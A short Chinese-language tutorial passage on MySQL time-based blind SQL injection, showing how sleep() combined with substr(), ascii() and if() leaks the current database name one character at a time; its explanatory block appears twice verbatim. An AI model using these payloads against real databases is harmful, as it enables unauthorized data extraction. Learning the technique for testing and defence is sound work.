mysql内一些可以延时注入的查询语句
一、sleep()
配合其他函数进行使用将十分方便,如下所示:
拆分讲解:
select substr(database(),1,1) ;
截取当前数据库的第一位,转换为ascii码值:
select ascii(substr(database(),1,1));
如果ascii码值大于115,即可返回0,否则延时5秒显示结果:
select If(ascii(substr(database(),1,1))>115,0,sleep(5));
配合其他函数进行使用将十分方便,如下所示:
拆分讲解:
select substr(database(),1,1) ;
截取当前数据库的第一位,转换为ascii码值:
select ascii(substr(database(),1,1));
如果ascii码值大于115,即可返回0,否则延时5秒显示结果:
select If(ascii(substr(database(),1,1))>115,0,sleep(5));
